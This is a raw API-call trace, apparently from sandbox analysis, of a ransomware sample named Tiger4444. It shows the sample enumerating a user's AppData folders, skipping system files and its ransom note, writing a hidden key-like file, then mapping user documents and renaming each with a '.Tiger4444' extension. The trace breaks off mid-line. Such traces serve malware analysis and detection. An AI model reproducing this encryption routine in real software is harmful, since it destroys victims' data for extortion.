[0049.840] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x3b5a0677, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x82b9d7a4, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.840] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.840] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.840] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0049.840] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.840] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.840] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x82b9d7a4, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x82b9d7a4, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x82b9d7a4, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.840] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.840] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.840] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210ad1cc, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xd6a9d454, ftLastAccessTime.dwHighDateTime=0x1d35e03, ftLastWriteTime.dwLowDateTime=0xd6a9d454, ftLastWriteTime.dwHighDateTime=0x1d35e03, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0049.840] lstrcmpiW (lpString1="Local", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.840] lstrcmpiW (lpString1="Local", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.841] lstrcmpiW (lpString1="Local", lpString2="Tiger4444.exe") returned -1 [0049.841] lstrcmpiW (lpString1="Local", lpString2=".") returned 1 [0049.841] lstrcmpiW (lpString1="Local", lpString2="..") returned 1 [0049.841] lstrcmpiW (lpString1="Local", lpString2="windows") returned -1 [0049.841] lstrcmpiW (lpString1="Local", lpString2="bootmgr") returned 1 [0049.841] lstrcmpiW (lpString1="Local", lpString2="pagefile.sys") returned -1 [0049.841] lstrcmpiW (lpString1="Local", lpString2="boot") returned 1 [0049.841] lstrcmpiW (lpString1="Local", lpString2="ids.txt") returned 1 [0049.841] lstrcmpiW (lpString1="Local", lpString2="NTUSER.DAT") returned -1 [0049.841] lstrcpyW (in: lpString1=0x30aead8, lpString2="Local" | out: lpString1="Local") returned="Local" [0049.841] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66440 [0049.841] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x3c) returned 0xc824f0 [0049.841] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66448 | out: ListHead=0xc66828, ListEntry=0xc66448) returned 0xc666e8 [0049.841] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x34f2b3d6, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xb373310b, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb373310b, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0049.841] lstrcmpiW (lpString1="LocalLow", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.841] lstrcmpiW (lpString1="LocalLow", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.841] lstrcmpiW (lpString1="LocalLow", lpString2="Tiger4444.exe") returned -1 [0049.841] lstrcmpiW (lpString1="LocalLow", lpString2=".") returned 1 [0049.841] lstrcmpiW (lpString1="LocalLow", lpString2="..") returned 1 [0049.841] lstrcmpiW (lpString1="LocalLow", lpString2="windows") returned -1 [0049.841] lstrcmpiW (lpString1="LocalLow", lpString2="bootmgr") returned 1 [0049.841] lstrcmpiW (lpString1="LocalLow", lpString2="pagefile.sys") returned -1 [0049.841] lstrcmpiW (lpString1="LocalLow", lpString2="boot") returned 1 [0049.841] lstrcmpiW (lpString1="LocalLow", lpString2="ids.txt") returned 1 [0049.841] lstrcmpiW (lpString1="LocalLow", lpString2="NTUSER.DAT") returned -1 [0049.841] lstrcpyW (in: lpString1=0x30aead8, lpString2="LocalLow" | out: lpString1="LocalLow") returned="LocalLow" [0049.841] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66540 [0049.841] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x42) returned 0xc7b5a8 [0049.841] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66548 | out: ListHead=0xc66828, ListEntry=0xc66548) returned 0xc66448 [0049.841] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x687a27a7, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x687a27a7, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0049.841] lstrcmpiW (lpString1="Roaming", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.841] lstrcmpiW (lpString1="Roaming", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.841] lstrcmpiW (lpString1="Roaming", lpString2="Tiger4444.exe") returned -1 [0049.841] lstrcmpiW (lpString1="Roaming", lpString2=".") returned 1 [0049.841] lstrcmpiW (lpString1="Roaming", lpString2="..") returned 1 [0049.841] lstrcmpiW (lpString1="Roaming", lpString2="windows") returned -1 [0049.841] lstrcmpiW (lpString1="Roaming", lpString2="bootmgr") returned 1 [0049.841] lstrcmpiW (lpString1="Roaming", lpString2="pagefile.sys") returned 1 [0049.841] lstrcmpiW (lpString1="Roaming", lpString2="boot") returned 1 [0049.841] lstrcmpiW (lpString1="Roaming", lpString2="ids.txt") returned 1 [0049.842] lstrcmpiW (lpString1="Roaming", lpString2="NTUSER.DAT") returned 1 [0049.842] lstrcpyW (in: lpString1=0x30aead8, lpString2="Roaming" | out: lpString1="Roaming") returned="Roaming" [0049.842] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc665c0 [0049.842] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x40) returned 0xc82268 [0049.842] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc665c8 | out: ListHead=0xc66828, ListEntry=0xc665c8) returned 0xc66548 [0049.842] FindNextFileW (in: hFindFile=0xc73108, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x687a27a7, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x687a27a7, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0049.842] FindClose (in: hFindFile=0xc73108 | out: hFindFile=0xc73108) returned 1 [0049.842] lstrcpyW (in: lpString1=0x30aead8, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.842] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0049.844] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0049.844] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0049.844] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.844] CloseHandle (hObject=0x260) returned 1 [0049.844] CloseHandle (hObject=0x2ac) returned 1 [0049.844] GetCurrentThreadId () returned 0xfa8 [0049.844] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc665c8 [0049.844] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0049.844] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc82268 | out: hHeap=0xc50000) returned 1 [0049.844] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc665c0 | out: hHeap=0xc50000) returned 1 [0049.844] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0049.844] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0049.844] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\.BFC0E91B00AE8A0620D3" [0049.844] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0049.846] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0049.879] FlushFileBuffers (hFile=0x2ac) returned 1 [0049.880] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.881] CloseHandle (hObject=0x2ac) returned 1 [0049.882] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming") returned 31 [0049.882] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.882] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x687a27a7, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x82b9d7a4, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0049.882] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.882] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.882] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0049.882] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.882] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x687a27a7, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x82b9d7a4, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.882] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.882] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.882] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0049.882] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.882] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.882] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x82b9d7a4, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x82b9d7a4, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x82c0fe93, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.882] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.882] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.882] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a8dd10, ftCreationTime.dwHighDateTime=0x1d4d20b, ftLastAccessTime.dwLowDateTime=0x71567d50, ftLastAccessTime.dwHighDateTime=0x1d4ce0c, ftLastWriteTime.dwLowDateTime=0x71567d50, ftLastWriteTime.dwHighDateTime=0x1d4ce0c, nFileSizeHigh=0x0, nFileSizeLow=0x16b70, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="294sz.ods", cAlternateFileName="")) returned 1 [0049.882] lstrcmpiW (lpString1="294sz.ods", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.882] lstrcmpiW (lpString1="294sz.ods", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.882] lstrcmpiW (lpString1="294sz.ods", lpString2="Tiger4444.exe") returned -1 [0049.882] lstrcmpiW (lpString1="294sz.ods", lpString2=".") returned 1 [0049.882] lstrcmpiW (lpString1="294sz.ods", lpString2="..") returned 1 [0049.883] lstrcmpiW (lpString1="294sz.ods", lpString2="windows") returned -1 [0049.883] lstrcmpiW (lpString1="294sz.ods", lpString2="bootmgr") returned -1 [0049.883] lstrcmpiW (lpString1="294sz.ods", lpString2="pagefile.sys") returned -1 [0049.883] lstrcmpiW (lpString1="294sz.ods", lpString2="boot") returned -1 [0049.883] lstrcmpiW (lpString1="294sz.ods", lpString2="ids.txt") returned -1 [0049.883] lstrcmpiW (lpString1="294sz.ods", lpString2="NTUSER.DAT") returned -1 [0049.883] lstrcpyW (in: lpString1=0x30aeae8, lpString2="294sz.ods" | out: lpString1="294sz.ods") returned="294sz.ods" [0049.883] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\294sz.ods", dwFileAttributes=0x0) returned 1 [0049.883] lstrlenW (lpString="294sz.ods") returned 9 [0049.883] lstrlenW (lpString="Tiger4444") returned 9 [0049.883] lstrcmpiW (lpString1="294sz.ods", lpString2="Tiger4444") returned -1 [0049.883] lstrlenW (lpString=".dll") returned 4 [0049.883] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0049.883] lstrlenW (lpString=".lnk") returned 4 [0049.883] lstrcmpiW (lpString1=".ods", lpString2=".lnk") returned 1 [0049.883] lstrlenW (lpString=".ini") returned 4 [0049.883] lstrcmpiW (lpString1=".ods", lpString2=".ini") returned 1 [0049.883] lstrlenW (lpString=".sys") returned 4 [0049.883] lstrcmpiW (lpString1=".ods", lpString2=".sys") returned -1 [0049.883] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\294sz.ods" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\294sz.ods"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.883] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.883] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14133651627) returned 1 [0049.883] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=93040) returned 1 [0049.884] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89b30 [0049.884] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0049.884] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16e70, lpName=0x0) returned 0x2c8 [0049.884] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16e70) returned 0xbe0000 [0049.885] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.885] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0049.886] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.886] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0049.886] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.886] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0049.886] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.886] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0049.886] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14133906877) returned 1 [0049.886] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89b30 | out: hHeap=0xc50000) returned 1 [0049.886] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0049.886] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.887] CloseHandle (hObject=0x2c8) returned 1 [0049.887] CloseHandle (hObject=0x260) returned 1 [0049.887] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\294sz.ods.Tiger4444") returned 51 [0049.888] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\294sz.ods" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\294sz.ods"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\294sz.ods.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\294sz.ods.tiger4444"), dwFlags=0x1) returned 1 [0049.888] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1521e720, ftCreationTime.dwHighDateTime=0x1d4c625, ftLastAccessTime.dwLowDateTime=0x33003000, ftLastAccessTime.dwHighDateTime=0x1d4d131, ftLastWriteTime.dwLowDateTime=0x33003000, ftLastWriteTime.dwHighDateTime=0x1d4d131, nFileSizeHigh=0x0, nFileSizeLow=0x6773, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2kOsnDQ8sk4iEc.odt", cAlternateFileName="2KOSND~1.ODT")) returned 1 [0049.888] lstrcmpiW (lpString1="2kOsnDQ8sk4iEc.odt", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.888] lstrcmpiW (lpString1="2kOsnDQ8sk4iEc.odt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.888] lstrcmpiW (lpString1="2kOsnDQ8sk4iEc.odt", lpString2="Tiger4444.exe") returned -1 [0049.888] lstrcmpiW (lpString1="2kOsnDQ8sk4iEc.odt", lpString2=".") returned 1 [0049.888] lstrcmpiW (lpString1="2kOsnDQ8sk4iEc.odt", lpString2="..") returned 1 [0049.888] lstrcmpiW (lpString1="2kOsnDQ8sk4iEc.odt", lpString2="windows") returned -1 [0049.888] lstrcmpiW (lpString1="2kOsnDQ8sk4iEc.odt", lpString2="bootmgr") returned -1 [0049.888] lstrcmpiW (lpString1="2kOsnDQ8sk4iEc.odt", lpString2="pagefile.sys") returned -1 [0049.888] lstrcmpiW (lpString1="2kOsnDQ8sk4iEc.odt", lpString2="boot") returned -1 [0049.888] lstrcmpiW (lpString1="2kOsnDQ8sk4iEc.odt", lpString2="ids.txt") returned -1 [0049.888] lstrcmpiW (lpString1="2kOsnDQ8sk4iEc.odt", lpString2="NTUSER.DAT") returned -1 [0049.888] lstrcpyW (in: lpString1=0x30aeae8, lpString2="2kOsnDQ8sk4iEc.odt" | out: lpString1="2kOsnDQ8sk4iEc.odt") returned="2kOsnDQ8sk4iEc.odt" [0049.888] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\2kOsnDQ8sk4iEc.odt", dwFileAttributes=0x0) returned 1 [0049.889] lstrlenW (lpString="2kOsnDQ8sk4iEc.odt") returned 18 [0049.889] lstrlenW (lpString="Tiger4444") returned 9 [0049.889] lstrcmpiW (lpString1="k4iEc.odt", lpString2="Tiger4444") returned -1 [0049.889] lstrlenW (lpString=".dll") returned 4 [0049.889] lstrcmpiW (lpString1=".odt", lpString2=".dll") returned 1 [0049.889] lstrlenW (lpString=".lnk") returned 4 [0049.889] lstrcmpiW (lpString1=".odt", lpString2=".lnk") returned 1 [0049.889] lstrlenW (lpString=".ini") returned 4 [0049.889] lstrcmpiW (lpString1=".odt", lpString2=".ini") returned 1 [0049.889] lstrlenW (lpString=".sys") returned 4 [0049.889] lstrcmpiW (lpString1=".odt", lpString2=".sys") returned -1 [0049.889] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\2kOsnDQ8sk4iEc.odt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\2kosndq8sk4iec.odt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0049.889] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0049.889] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14134215388) returned 1 [0049.889] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=26483) returned 1 [0049.889] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89d10 [0049.889] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71510 [0049.889] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6a80, lpName=0x0) returned 0x2c8 [0049.889] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6a80) returned 0xbe0000 [0049.890] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0049.890] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0049.890] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0049.890] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0049.890] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0049.890] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0049.890] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0049.890] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0049.890] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14134360802) returned 1 [0049.891] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89d10 | out: hHeap=0xc50000) returned 1 [0049.891] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71510 | out: hHeap=0xc50000) returned 1 [0049.891] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0049.891] CloseHandle (hObject=0x2c8) returned 1 [0049.891] CloseHandle (hObject=0x260) returned 1 [0049.892] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\2kOsnDQ8sk4iEc.odt.Tiger4444") returned 60 [0049.892] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\2kOsnDQ8sk4iEc.odt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\2kosndq8sk4iec.odt"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\2kOsnDQ8sk4iEc.odt.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\2kosndq8sk4iec.odt.tiger4444"), dwFlags=0x1) returned 1 [0049.892] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7db9450, ftCreationTime.dwHighDateTime=0x1d4d389, ftLastAccessTime.dwLowDateTime=0x51ccf790, ftLastAccessTime.dwHighDateTime=0x1d4cb26, ftLastWriteTime.dwLowDateTime=0x51ccf790, ftLastWriteTime.dwHighDateTime=0x1d4cb26, nFileSizeHigh=0x0, nFileSizeLow=0x127ea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="66w2QG9-.m4a", cAlternateFileName="")) returned 1 [0049.892] lstrcmpiW (lpString1="66w2QG9-.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.892] lstrcmpiW (lpString1="66w2QG9-.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.892] lstrcmpiW (lpString1="66w2QG9-.m4a", lpString2="Tiger4444.exe") returned -1 [0049.892] lstrcmpiW (lpString1="66w2QG9-.m4a", lpString2=".") returned 1 [0049.892] lstrcmpiW (lpString1="66w2QG9-.m4a", lpString2="..") returned 1 [0049.892] lstrcmpiW (lpString1="66w2QG9-.m4a", lpString2="windows") returned -1 [0049.892] lstrcmpiW (lpString1="66w2QG9-.m4a", 